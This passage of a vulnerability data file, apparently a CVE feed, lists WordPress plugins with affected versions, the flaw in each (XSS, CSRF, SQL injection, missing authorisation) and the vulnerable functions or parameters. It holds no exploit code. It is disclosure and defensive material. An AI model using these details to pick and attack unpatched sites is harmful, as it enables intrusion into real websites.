wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/tags\\\/8.5.7\\\/includes\\\/classes\\\/class.dashboard.php#L1512\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/tags\\\/8.5.7\\\/includes\\\/classes\\\/class.dashboard.php#L1512\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/tags\\\/8.5.7\\\/includes\\\/classes\\\/class.dashboard.php#L1493\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/tags\\\/8.5.7\\\/includes\\\/classes\\\/class.dashboard.php#L1493\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/tags\\\/8.5.7\\\/includes\\\/classes\\\/class.dashboard.php#L1539\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nex-forms-express-wp-form-builder\\\/tags\\\/8.5.7\\\/includes\\\/classes\\\/class.dashboard.php#L1539\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0779","slug":"enjoy-instagram-instagram-responsive-images-gallery-and-carousel","versionImpact":"6.2.2","description":"The Enjoy Social Feed plugin for WordPress website WordPress plugin through 6.2.2 does not have authorisation and CSRF in various function hooked to admin_init, allowing unauthenticated users to call them and unlink arbitrary users Instagram Account for example","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ced134cf-82c5-401b-9476-b6456e1924e2\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ced134cf-82c5-401b-9476-b6456e1924e2\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3663","slug":"wp-scraper","versionImpact":"5.7","description":"The WP Scraper plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the wp_scraper_multi_scrape_action() function in all versions up to, and including, 5.7. This makes it possible for authenticated attackers, with subscriber-level access and above, to create arbitrary pages and posts.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1a4bc52d-5771-4e7b-a394-772f2a5edbd7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1a4bc52d-5771-4e7b-a394-772f2a5edbd7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-scraper\\\/trunk\\\/wp-scraper.php#L1426\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-scraper\\\/trunk\\\/wp-scraper.php#L1426\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6669","slug":"chatbot","versionImpact":"5.5.7","description":"The AI ChatBot for WordPress \u2013 WPBot plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 5.5.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce23efed-fe21-486a-ab3b-9ed0dd26a971?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce23efed-fe21-486a-ab3b-9ed0dd26a971?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chatbot\\\/trunk\\\/admin_ui.php#L755\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chatbot\\\/trunk\\\/admin_ui.php#L755\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/chatbot\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/chatbot\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chatbot\\\/trunk\\\/admin_ui.php#L2211\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chatbot\\\/trunk\\\/admin_ui.php#L2211\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3119022\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3119022\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8734","slug":"lucas-string-replace","versionImpact":"2.0.5","description":"The Lucas String Replace plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.0.5. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cf1e4b20-e7e5-4a3a-9895-02d51499d54e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cf1e4b20-e7e5-4a3a-9895-02d51499d54e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lucas-string-replace\\\/trunk\\\/includes\\\/class-lucas-string-replace-settings.php#L176\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lucas-string-replace\\\/trunk\\\/includes\\\/class-lucas-string-replace-settings.php#L176\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8666","slug":"shoutcast-icecast-html5-radio-player","versionImpact":"2.1.6","description":"The Shoutcast Icecast HTML5 Radio Player plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'html5radio' shortcode in all versions up to, and including, 2.1.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e870ae2-abae-457a-b3d1-75a96ec09d41?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e870ae2-abae-457a-b3d1-75a96ec09d41?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shoutcast-icecast-html5-radio-player\\\/trunk\\\/shoutcast-icecast-html5-radio-player.php#L379\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shoutcast-icecast-html5-radio-player\\\/trunk\\\/shoutcast-icecast-html5-radio-player.php#L379\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9386","slug":"exclusive-divi","versionImpact":"1.4","description":"The Exclusive Divi \u2013 Divi Preloader, Modules for Divi & Extra Theme plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7bf68565-ea30-4caf-8323-b0b88561e89f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7bf68565-ea30-4caf-8323-b0b88561e89f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/exclusive-divi\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/exclusive-divi\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/exclusive-divi\\\/trunk\\\/public\\\/script-handler.php#L62\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/exclusive-divi\\\/trunk\\\/public\\\/script-handler.php#L62\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10832","slug":"posti-shipping","versionImpact":"3.10.3","description":"The Posti Shipping plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.10.3. This is due to missing or incorrect nonce validation on the generate_notices_html() function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/posti-shipping\\\/tags\\\/3.10.3\\\/core\\\/class-shipping-method.php#L104\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/posti-shipping\\\/tags\\\/3.10.3\\\/core\\\/class-shipping-method.php#L104\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/posti-shipping\\\/tags\\\/3.10.3\\\/core\\\/class-shipping-method.php#L87\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/posti-shipping\\\/tags\\\/3.10.3\\\/core\\\/class-shipping-method.php#L87\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/posti-shipping\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/posti-shipping\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/079c77f1-3aab-4457-ad66-a2a2d9a55b2e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/079c77f1-3aab-4457-ad66-a2a2d9a55b2e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11867","slug":"companion-portfolio","versionImpact":"2.4.0.1","description":"The Companion Portfolio \u2013 Responsive Portfolio Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'companion-portfolio' shortcode in all versions up to, and including, 2.4.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/companion-portfolio\\\/tags\\\/2.4.0.1\\\/companion_portfolio.php#L322\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/companion-portfolio\\\/tags\\\/2.4.0.1\\\/companion_portfolio.php#L322\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/21df75e6-1f3e-4a08-a620-92b44fb48899?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/21df75e6-1f3e-4a08-a620-92b44fb48899?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12124","slug":"role-includer","versionImpact":"1.6","description":"The Role Includer plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018user_id\u2019 parameter in all versions up to, and including, 1.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/role-includer\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/role-includer\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/97b3399b-cda2-4ab1-8919-b1e4ba4a5dcf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/97b3399b-cda2-4ab1-8919-b1e4ba4a5dcf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13184","slug":"wpextended","versionImpact":"3.0.12","description":"The The Ultimate WordPress Toolkit \u2013 WP Extended plugin for WordPress is vulnerable to time-based SQL Injection via the Login Attempts module in all versions up to, and including, 3.0.12 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpextended\\\/trunk\\\/includes\\\/modules\\\/core_extensions\\\/wpext_limit_login_attempts\\\/wpext_limit_login_attempts.php#L105\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpextended\\\/trunk\\\/includes\\\/modules\\\/core_extensions\\\/wpext_limit_login_attempts\\\/wpext_limit_login_attempts.php#L105\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3220003\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3220003\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpextended\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpextended\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/abab29c7-88a9-4c6f-9691-ed9087cde2ff?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/abab29c7-88a9-4c6f-9691-ed9087cde2ff?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13736","slug":"pure-chat","versionImpact":"2.31","description":"The Pure Chat \u2013 Live Chat & More! plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018purechatWidgetName\u2019 parameter in all versions up to, and including, 2.31 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pure-chat\\\/trunk\\\/purechat.php#L149\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pure-chat\\\/trunk\\\/purechat.php#L149\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pure-chat\\\/trunk\\\/purechat.php#L99\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pure-chat\\\/trunk\\\/purechat.php#L99\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pure-chat\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pure-chat\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e11993c1-48fa-4e37-850d-d02e3e20d56f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e11993c1-48fa-4e37-850d-d02e3e20d56f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5285","slug":"product-subtitle-for-woocommerce","versionImpact":"1.3.9","description":"The Product Subtitle for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018htmlTag\u2019 parameter in all versions up to, and including, 1.3.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/product-subtitle-for-woocommerce\\\/tags\\\/1.3.9\\\/includes\\\/plugins\\\/class-pswc-guternburg-block.php#L82\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/product-subtitle-for-woocommerce\\\/tags\\\/1.3.9\\\/includes\\\/plugins\\\/class-pswc-guternburg-block.php#L82\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/product-subtitle-for-woocommerce\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/product-subtitle-for-woocommerce\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b276b1f7-e618-491f-beb4-675228632fa0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b276b1f7-e618-491f-beb4-675228632fa0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8400","slug":"bee-quick-gallery","versionImpact":"1.0.0","description":"The Image Gallery plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/bee-quick-gallery\\\/trunk\\\/includes\\\/bee-quick-gallery-functions.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/bee-quick-gallery\\\/trunk\\\/includes\\\/bee-quick-gallery-functions.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bee-quick-gallery\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bee-quick-gallery\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ef52026b-1bfc-481c-8eb7-511d1910a35e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ef52026b-1bfc-481c-8eb7-511d1910a35e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1867","slug":"yourchannel","versionImpact":"1.2.3","description":"The YourChannel plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.2.3. This is due to missing or incorrect nonce validation on the save function. This makes it possible for unauthenticated attackers to change the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4c20db2d-f73d-4e52-a275-ab1975ae4b17?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4c20db2d-f73d-4e52-a275-ab1975ae4b17?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/yourchannel\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/yourchannel\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yourchannel\\\/trunk\\\/YourChannel.php?rev=2844975#L426\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yourchannel\\\/trunk\\\/YourChannel.php?rev=2844975#L426\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3052","slug":"page-builder-by-azexo","versionImpact":"1.27.133","description":"The Page Builder by AZEXO plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.27.133. This is due to missing or incorrect nonce validation on the 'azh_add_post', 'azh_duplicate_post', 'azh_update_post' and 'azh_remove_post' functions. This makes it possible for unauthenticated attackers to create, modify, and delete a post via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-builder-by-azexo\\\/trunk\\\/azexo_html.php#L4137\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-builder-by-azexo\\\/trunk\\\/azexo_html.php#L4137\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-builder-by-azexo\\\/trunk\\\/azexo_html.php#L4159\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-builder-by-azexo\\\/trunk\\\/azexo_html.php#L4159\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-builder-by-azexo\\\/trunk\\\/azexo_html.php#L4174\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-builder-by-azexo\\\/trunk\\\/azexo_html.php#L4174\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-builder-by-azexo\\\/trunk\\\/azexo_html.php#L4085\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-builder-by-azexo\\\/trunk\\\/azexo_html.php#L4085\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a4e26035-ce4e-4b4b-aa3c-cd86b29b199a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a4e26035-ce4e-4b4b-aa3c-cd86b29b199a?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-builder-by-azexo\\\/trunk\\\/azexo_html.php#L4190\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/page-builder-by-azexo\\\/trunk\\\/azexo_html.php#L4190\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0838","slug":"happy-elementor-addons","versionImpact":"3.10.1","description":"The Happy Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the side image URL parameter in the Age Gate in all versions up to, and including, 3.10.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d55bab2a-5e2e-440e-b4fa-03853679ba22?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d55bab2a-5e2e-440e-b4fa-03853679ba22?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/happy-elementor-addons\\\/tags\\\/3.10.1\\\/widgets\\\/age-gate\\\/widget.php#L2121\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/happy-elementor-addons\\\/tags\\\/3.10.1\\\/widgets\\\/age-gate\\\/widget.php#L2121\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3028056%40happy-elementor-addons%2Ftrunk&old=3016053%40happy-elementor-addons%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3028056%40happy-elementor-addons%2Ftrunk&old=3016053%40happy-elementor-addons%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0719","slug":"tabs-shortcode-and-widget","versionImpact":"1.17","description":"The Tabs Shortcode and Widget WordPress plugin through 1.17 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6e67bf7f-07e6-432b-a8f4-aa69299aecaf\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6e67bf7f-07e6-432b-a8f4-aa69299aecaf\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3198","slug":"wp-font-awesome-share-icons","versionImpact":"1.1.1","description":"The WP Font Awesome Share Icons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's \r\n'wpfai_social' shortcode in all versions up to, and including, 1.1.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd066a04-8094-4004-8a64-317c6bd4e101?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd066a04-8094-4004-8a64-317c6bd4e101?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-font-awesome-share-icons\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-font-awesome-share-icons\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8732","slug":"leira-roles","versionImpact":"1.1.9","description":"The Roles & Capabilities plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.1.9. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3956cd40-6b46-4013-9d71-a979de2c3687?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3956cd40-6b46-4013-9d71-a979de2c3687?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/leira-roles\\\/trunk\\\/admin\\\/class-leira-roles-admin.php#L413\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/leira-roles\\\/trunk\\\/admin\\\/class-leira-roles-admin.php#L413\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/leira-roles\\\/trunk\\\/admin\\\/class-leira-roles-admin.php#L541\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/leira-roles\\\/trunk\\\/admin\\\/class-leira-roles-admin.php#L541\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10343","slug":"beek-widget-extention","versionImpact":"0.9.5","description":"The Beek Widget Extention plugin for WordPress is vulnerable to Stored Cross-Site Scripting via shortcodes in versions up to, and including, 0.9.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a 